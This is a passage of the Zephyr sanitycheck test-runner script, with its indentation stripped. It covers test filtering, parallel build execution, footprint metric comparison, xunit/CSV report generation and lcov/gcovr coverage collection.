status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
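# Illustrative usage sketch (not part of the original script): BoundedExecutor
# blocks submit() once `bound` items beyond the worker count are queued, which
# keeps a fast producer from flooding the work queue. Hypothetical example:
#
#   with BoundedExecutor(bound=4, max_workers=2) as ex:
#       futures = [ex.submit(print, i) for i in range(100)]  # blocks when full
#       concurrent.futures.wait(futures)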
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a message from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
eleTestsuite = eleTestsuites.findall(f'testsuite/[@name="{p}"]')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message="Skipped")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
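# Example of the handler.log lines parsed above, reconstructed from the parsing
# logic (the path and hex payload are hypothetical):
#
#   GCOV_COVERAGE_DUMP_START
#   */path/to/build/obj/file.gcda<adcc0100...00ff
#   GCOV_COVERAGE_DUMP_END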
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# gcovr fails if kobject_hash is included in the coverage data, so skip it
# (this is a problem only in gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, items):
tuple_list = [(prefix, item) for item in items]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
